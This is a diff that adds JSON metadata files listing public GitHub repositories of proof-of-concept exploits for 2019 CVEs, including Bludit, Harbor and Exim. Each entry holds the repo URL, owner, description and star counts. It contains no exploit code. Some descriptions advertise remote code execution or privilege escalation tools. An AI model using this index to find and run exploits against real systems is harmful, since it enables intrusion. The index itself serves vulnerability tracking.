"html_url": "https:\/\/github.com\/jas502n\/CVE-2019-15642", + "description": "Webmin Remote Code Execution (authenticated) ", + "fork": false, + "created_at": "2019-09-01T09:28:56Z", + "updated_at": "2024-08-12T19:52:34Z", + "pushed_at": "2019-09-01T11:35:43Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1579.json b/2019/CVE-2019-1579.json new file mode 100644 index 0000000000..4412455ea9 --- /dev/null +++ b/2019/CVE-2019-1579.json @@ -0,0 +1,64 @@ +[ + { + "id": 207451672, + "name": "CVE-2019-1579", + "full_name": "securifera\/CVE-2019-1579", + "owner": { + "login": "securifera", + "id": 12126525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12126525?v=4", + "html_url": "https:\/\/github.com\/securifera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securifera\/CVE-2019-1579", + "description": null, + "fork": false, + "created_at": "2019-09-10T02:53:03Z", + "updated_at": "2024-08-12T19:52:52Z", + "pushed_at": "2019-09-10T15:57:23Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 63, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 306017929, + "name": "CVE-2019-1579", + "full_name": "Elsfa7-110\/CVE-2019-1579", + "owner": { + "login": "Elsfa7-110", + "id": 26175351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26175351?v=4", + "html_url": "https:\/\/github.com\/Elsfa7-110", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elsfa7-110\/CVE-2019-1579", + "description": null, + "fork": false, + "created_at": "2020-10-21T12:30:42Z", + "updated_at": "2020-10-21T12:31:54Z", + "pushed_at": "2020-10-21T12:31:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15813.json b/2019/CVE-2019-15813.json new file mode 100644 index 0000000000..b12bc65b0c --- /dev/null +++ b/2019/CVE-2019-15813.json @@ -0,0 +1,33 @@ +[ + { + "id": 315012145, + "name": "CVE-2019-15813", + "full_name": "wolf1892\/CVE-2019-15813", + "owner": { + "login": "wolf1892", + "id": 24608781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24608781?v=4", + "html_url": "https:\/\/github.com\/wolf1892", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wolf1892\/CVE-2019-15813", + "description": "This container was made to explain and demonstrate how CVE-2019-15813 (Sentrifugo works)", + "fork": false, + "created_at": "2020-11-22T10:35:24Z", + "updated_at": "2021-09-02T03:42:34Z", + "pushed_at": "2020-11-22T10:50:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15846.json b/2019/CVE-2019-15846.json new file mode 100644 index 0000000000..6323ed91d6 --- /dev/null +++ b/2019/CVE-2019-15846.json @@ -0,0 +1,33 @@ +[ + { + "id": 213952894, + "name": "Exim-CVE-2019-15846", + "full_name": "synacktiv\/Exim-CVE-2019-15846", + "owner": { + "login": "synacktiv", + "id": 50145679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4", + "html_url": "https:\/\/github.com\/synacktiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/synacktiv\/Exim-CVE-2019-15846", + "description": "PoC materials to exploit CVE-2019-15846", + "fork": false, + "created_at": "2019-10-09T15:19:58Z", + "updated_at": "2024-08-12T19:53:45Z", + "pushed_at": "2019-10-10T09:55:59Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 30, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15858.json b/2019/CVE-2019-15858.json new file mode 100644 index 0000000000..9ee0f1d3b5 --- /dev/null +++ b/2019/CVE-2019-15858.json @@ -0,0 +1,67 @@ +[ + { + "id": 208152610, + "name": "CVE-2019-15858", + "full_name": "GeneralEG\/CVE-2019-15858", + "owner": { + "login": "GeneralEG", + "id": 20465962, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20465962?v=4", + "html_url": "https:\/\/github.com\/GeneralEG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GeneralEG\/CVE-2019-15858", + "description": "Unauthenticated RCE at Woody Ad Snippets \/ CVE-2019-15858 (PoC)", + "fork": false, + "created_at": "2019-09-12T21:52:55Z", + "updated_at": "2024-08-12T19:52:57Z", + "pushed_at": "2023-04-25T05:29:09Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 32, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 416094403, + "name": "CVE-2019-15858", + "full_name": "orangmuda\/CVE-2019-15858", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2019-15858", + "description": "Unauthenticated Remote Code Execution at Woody Ad Snippets (PoC)", + "fork": false, + "created_at": "2021-10-11T21:37:06Z", + "updated_at": "2024-08-12T20:17:12Z", + "pushed_at": "2021-10-11T21:41:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-15858", + "remote-code-execution" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15896.json b/2019/CVE-2019-15896.json new file mode 100644 index 0000000000..05fb820114 --- /dev/null +++ b/2019/CVE-2019-15896.json @@ -0,0 +1,33 @@ +[ + { + "id": 681788394, + "name": "CVE-2019-15896", + "full_name": "RandomRobbieBF\/CVE-2019-15896", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2019-15896", + "description": "LifterLMS <= 3.34.5 - Unauthenticated Options Import", + "fork": false, + "created_at": "2023-08-22T18:56:09Z", + "updated_at": "2024-08-12T20:32:33Z", + "pushed_at": "2023-08-22T18:59:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15972.json b/2019/CVE-2019-15972.json new file mode 100644 index 0000000000..6d19926f4b --- /dev/null +++ b/2019/CVE-2019-15972.json @@ -0,0 +1,33 @@ +[ + { + "id": 222742364, + "name": "Cisco-UCM-SQLi-Scripts", + "full_name": "FSecureLABS\/Cisco-UCM-SQLi-Scripts", + "owner": { + "login": "FSecureLABS", + "id": 1469843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1469843?v=4", + "html_url": "https:\/\/github.com\/FSecureLABS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FSecureLABS\/Cisco-UCM-SQLi-Scripts", + "description": "Scripts that can be used to exploit CVE-2019-15972 which was an Authenticated SQLi issue in Cisco Unified Call Manager (UCM).", + "fork": false, + "created_at": "2019-11-19T16:38:39Z", + "updated_at": "2024-08-12T19:55:01Z", + "pushed_at": "2019-11-20T15:05:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16097.json b/2019/CVE-2019-16097.json new file mode 100644 index 0000000000..4d0a75ac73 --- /dev/null +++ b/2019/CVE-2019-16097.json @@ -0,0 +1,188 @@ +[ + { + "id": 209584763, + "name": "CVE-2019-16097", + "full_name": "evilAdan0s\/CVE-2019-16097", + "owner": { + "login": "evilAdan0s", + "id": 37237766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37237766?v=4", + "html_url": "https:\/\/github.com\/evilAdan0s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/evilAdan0s\/CVE-2019-16097", + "description": "CVE-2019-16097 PoC", + "fork": false, + "created_at": "2019-09-19T15:12:11Z", + "updated_at": "2024-08-12T19:53:09Z", + "pushed_at": "2019-09-19T15:27:48Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 209684562, + "name": "CVE-2019-16097-batch", + "full_name": "rockmelodies\/CVE-2019-16097-batch", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/CVE-2019-16097-batch", + "description": "CVE-2019-16097-batch", + "fork": false, + "created_at": "2019-09-20T02:03:45Z", + "updated_at": "2024-08-12T19:53:10Z", + "pushed_at": "2019-09-21T04:51:38Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 210135326, + "name": "CVE-2019-16097", + "full_name": "ianxtianxt\/CVE-2019-16097", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2019-16097", + "description": null, + "fork": false, + "created_at": "2019-09-22T11:24:28Z", + "updated_at": "2024-08-12T19:53:13Z", + "pushed_at": "2019-09-22T11:26:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 210735062, + "name": "cve-2019-16097", + "full_name": "dacade\/cve-2019-16097", + "owner": { + "login": "dacade", + "id": 31815137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31815137?v=4", + "html_url": "https:\/\/github.com\/dacade", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dacade\/cve-2019-16097", + "description": "cve-2019-1609", + "fork": false, + "created_at": "2019-09-25T02:05:49Z", + "updated_at": "2024-08-12T19:53:19Z", + "pushed_at": "2019-09-25T02:24:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 212393854, + "name": "harbor-give-me-admin", + "full_name": "theLSA\/harbor-give-me-admin", + "owner": { + "login": "theLSA", + "id": 28248956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28248956?v=4", + "html_url": "https:\/\/github.com\/theLSA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theLSA\/harbor-give-me-admin", + "description": "harbor(<1.7.6\/1.8.3) privilege escalation (CVE-2019-16097)", + "fork": false, + "created_at": "2019-10-02T16:53:06Z", + "updated_at": "2024-08-12T19:53:36Z", + "pushed_at": "2019-10-02T17:01:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 221669111, + "name": "CVE-2019-16097", + "full_name": "luckybool1020\/CVE-2019-16097", + "owner": { + "login": "luckybool1020", + "id": 16422202, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16422202?v=4", + "html_url": "https:\/\/github.com\/luckybool1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luckybool1020\/CVE-2019-16097", + "description": "Harbor 未授权创建管理员漏洞原理 docker及poc[基于pocsuite框架]", + "fork": false, + "created_at": "2019-11-14T10:19:47Z", + "updated_at": "2024-08-12T19:54:50Z", + "pushed_at": "2023-07-28T06:20:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16098.json b/2019/CVE-2019-16098.json new file mode 100644 index 0000000000..815d7801e0 --- /dev/null +++ b/2019/CVE-2019-16098.json @@ -0,0 +1,95 @@ +[ + { + "id": 207602452, + "name": "CVE-2019-16098", + "full_name": "Barakat\/CVE-2019-16098", + "owner": { + "login": "Barakat", + "id": 11032985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11032985?v=4", + "html_url": "https:\/\/github.com\/Barakat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Barakat\/CVE-2019-16098", + "description": "Local privilege escalation PoC exploit for CVE-2019-16098", + "fork": false, + "created_at": "2019-09-10T15:57:36Z", + "updated_at": "2024-09-19T03:32:29Z", + "pushed_at": "2019-09-13T20:05:43Z", + "stargazers_count": 191, + "watchers_count": 191, + "has_discussions": false, + "forks_count": 61, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 61, + "watchers": 191, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 686146566, + "name": "CVE-2019-16098", + "full_name": "0xDivyanshu-new\/CVE-2019-16098", + "owner": { + "login": "0xDivyanshu-new", + "id": 135882723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/135882723?v=4", + "html_url": "https:\/\/github.com\/0xDivyanshu-new", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDivyanshu-new\/CVE-2019-16098", + "description": null, + "fork": false, + "created_at": "2023-09-01T21:35:40Z", + "updated_at": "2024-10-31T14:53:35Z", + "pushed_at": "2023-09-02T10:41:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838448093, + "name": "NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE", + "full_name": "Offensive-Panda\/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE", + "owner": { + "login": "Offensive-Panda", + "id": 76246439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76246439?v=4", + "html_url": "https:\/\/github.com\/Offensive-Panda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Offensive-Panda\/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE", + "description": "This exploit rebuilds and exploit the CVE-2019-16098 which is in driver Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I\/O ports, and MSRs. Instead of hardcoded base address of Ntoskrnl.exe, I calculated it dynamically and recalulated the fields offsets", + "fork": false, + "created_at": "2024-08-05T16:55:40Z", + "updated_at": "2024-11-21T05:20:35Z", + "pushed_at": "2024-08-05T18:31:16Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16113.json b/2019/CVE-2019-16113.json new file mode 100644 index 0000000000..9fb9810377 --- /dev/null +++ b/2019/CVE-2019-16113.json @@ -0,0 +1,312 @@ +[ + { + "id": 269130305, + "name": "CVE-2019-16113", + "full_name": "ynots0ups\/CVE-2019-16113", + "owner": { + "login": "ynots0ups", + "id": 5343961, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5343961?v=4", + "html_url": "https:\/\/github.com\/ynots0ups", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynots0ups\/CVE-2019-16113", + "description": null, + "fork": false, + "created_at": "2020-06-03T15:49:41Z", + "updated_at": "2023-01-30T04:52:08Z", + "pushed_at": "2020-06-03T15:52:10Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 269405150, + "name": "CVE-2019-16113", + "full_name": "cybervaca\/CVE-2019-16113", + "owner": { + "login": "cybervaca", + "id": 6973635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6973635?v=4", + "html_url": "https:\/\/github.com\/cybervaca", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybervaca\/CVE-2019-16113", + "description": "CVE-2019-16113 - bludit >= 3.9.2 RCE authenticate", + "fork": false, + "created_at": "2020-06-04T16:06:44Z", + "updated_at": "2023-11-03T16:38:42Z", + "pushed_at": "2020-06-05T09:43:08Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 270998785, + "name": "CVE-2019-16113-PoC", + "full_name": "hg8\/CVE-2019-16113-PoC", + "owner": { + "login": "hg8", + "id": 9076747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9076747?v=4", + "html_url": "https:\/\/github.com\/hg8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hg8\/CVE-2019-16113-PoC", + "description": "Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)", + "fork": false, + "created_at": "2020-06-09T12:39:10Z", + "updated_at": "2024-10-24T22:24:06Z", + "pushed_at": "2020-06-09T12:42:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 276850480, + "name": "CVE-2019-16113-Dockerfile", + "full_name": "Kenun99\/CVE-2019-16113-Dockerfile", + "owner": { + "login": "Kenun99", + "id": 43341053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43341053?v=4", + "html_url": "https:\/\/github.com\/Kenun99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kenun99\/CVE-2019-16113-Dockerfile", + "description": null, + "fork": false, + "created_at": "2020-07-03T08:37:43Z", + "updated_at": "2020-07-04T08:34:53Z", + "pushed_at": "2020-07-04T08:34:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 280433276, + "name": "CVE-2019-16113", + "full_name": "dldygnl\/CVE-2019-16113", + "owner": { + "login": "dldygnl", + "id": 53053198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53053198?v=4", + "html_url": "https:\/\/github.com\/dldygnl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dldygnl\/CVE-2019-16113", + "description": "Bludit Exploitation Via upload Image.php ", + "fork": false, + "created_at": "2020-07-17T13:37:20Z", + "updated_at": "2020-09-04T18:11:12Z", + "pushed_at": "2020-09-04T18:11:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 300985470, + "name": "CVE-2019-16113", + "full_name": "0xConstant\/CVE-2019-16113", + "owner": { + "login": "0xConstant", + "id": 51972282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xConstant\/CVE-2019-16113", + "description": "Bludit 3.9.2 - Remote command execution - CVE-2019-16113", + "fork": false, + "created_at": "2020-10-03T21:38:39Z", + "updated_at": "2024-10-24T22:21:49Z", + "pushed_at": "2020-10-12T19:01:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 336189382, + "name": "CVE-2019-16113", + "full_name": "DXY0411\/CVE-2019-16113", + "owner": { + "login": "DXY0411", + "id": 42259364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4", + "html_url": "https:\/\/github.com\/DXY0411", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXY0411\/CVE-2019-16113", + "description": null, + "fork": false, + "created_at": "2021-02-05T06:51:51Z", + "updated_at": "2021-02-05T12:02:00Z", + "pushed_at": "2021-02-05T12:01:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478819535, + "name": "CVE-2019-16113_", + "full_name": "0xConstant\/CVE-2019-16113_", + "owner": { + "login": "0xConstant", + "id": 51972282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xConstant\/CVE-2019-16113_", + "description": null, + "fork": false, + "created_at": "2022-04-07T03:57:15Z", + "updated_at": "2024-10-17T07:18:21Z", + "pushed_at": "2022-04-14T02:56:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 778977291, + "name": "CVE-2019-16113", + "full_name": "mind2hex\/CVE-2019-16113", + "owner": { + "login": "mind2hex", + "id": 51345640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51345640?v=4", + "html_url": "https:\/\/github.com\/mind2hex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mind2hex\/CVE-2019-16113", + "description": "Bludit 3.9.2 Remote Command Execution (RCE)", + "fork": false, + "created_at": "2024-03-28T19:37:24Z", + "updated_at": "2024-04-07T08:46:26Z", + "pushed_at": "2024-03-28T19:38:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794496797, + "name": "cve-2019-16113", + "full_name": "tronghoang89\/cve-2019-16113", + "owner": { + "login": "tronghoang89", + "id": 128504785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128504785?v=4", + "html_url": "https:\/\/github.com\/tronghoang89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tronghoang89\/cve-2019-16113", + "description": null, + "fork": false, + "created_at": "2024-05-01T10:03:17Z", + "updated_at": "2024-05-01T10:03:18Z", + "pushed_at": "2024-05-01T10:03:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16172.json b/2019/CVE-2019-16172.json new file mode 100644 index 0000000000..5dd656f4c5 --- /dev/null +++ b/2019/CVE-2019-16172.json @@ -0,0 +1,33 @@ +[ + { + "id": 868009830, + "name": "CVE-2019-16172", + "full_name": "TrixSec\/CVE-2019-16172", + "owner": { + "login": "TrixSec", + "id": 157342883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/157342883?v=4", + "html_url": "https:\/\/github.com\/TrixSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TrixSec\/CVE-2019-16172", + "description": "The CVE-2019-16172 Scanner is designed to check LimeSurvey instances for the stored XSS vulnerability.", + "fork": false, + "created_at": "2024-10-05T08:30:54Z", + "updated_at": "2024-10-06T08:01:45Z", + "pushed_at": "2024-10-05T08:35:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16253.json b/2019/CVE-2019-16253.json new file mode 100644 index 0000000000..f5ca4dd4a5 --- /dev/null +++ b/2019/CVE-2019-16253.json @@ -0,0 +1,40 @@ +[ + { + "id": 591041270, + "name": "K0mraid3s-System-Shell-PREBUILT", + "full_name": "k0mraid3\/K0mraid3s-System-Shell-PREBUILT", + "owner": { + "login": "k0mraid3", + "id": 62849592, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62849592?v=4", + "html_url": "https:\/\/github.com\/k0mraid3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k0mraid3\/K0mraid3s-System-Shell-PREBUILT", + "description": "Exploit I discovered in October of 2022 with androids Package manager binary (pm) and the way it handled debugging flags, patched out by march 2023. Uses CVE-2019-16253 as a payload to obtain a system shell. ", + "fork": false, + "created_at": "2023-01-19T19:47:13Z", + "updated_at": "2024-11-26T18:44:49Z", + "pushed_at": "2024-03-20T19:12:39Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [ + "adb", + "android", + "exploit", + "samsung", + "shell", + "system" + ], + "visibility": "public", + "forks": 15, + "watchers": 78, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-16278.json b/2019/CVE-2019-16278.json new file mode 100644 index 0000000000..fc41d4dd37 --- /dev/null +++ b/2019/CVE-2019-16278.json @@ -0,0 +1,439 @@ +[ + { + "id": 215200285, + "name": "CVE-2019-16278", + "full_name": "jas502n\/CVE-2019-16278", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2019-16278", + "description": "Directory transversal to remote code execution", + "fork": false, + "created_at": "2019-10-15T03:40:13Z", + "updated_at": "2024-08-12T19:53:55Z", + "pushed_at": "2019-10-15T03:53:55Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 69, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 215258157, + "name": "CVE-2019-16278-PoC", + "full_name": "imjdl\/CVE-2019-16278-PoC", + "owner": { + "login": "imjdl", + "id": 31382943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31382943?v=4", + "html_url": "https:\/\/github.com\/imjdl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imjdl\/CVE-2019-16278-PoC", + "description": "CVE-2019-16728 Proof of Concept", + "fork": false, + "created_at": "2019-10-15T09:22:36Z", + 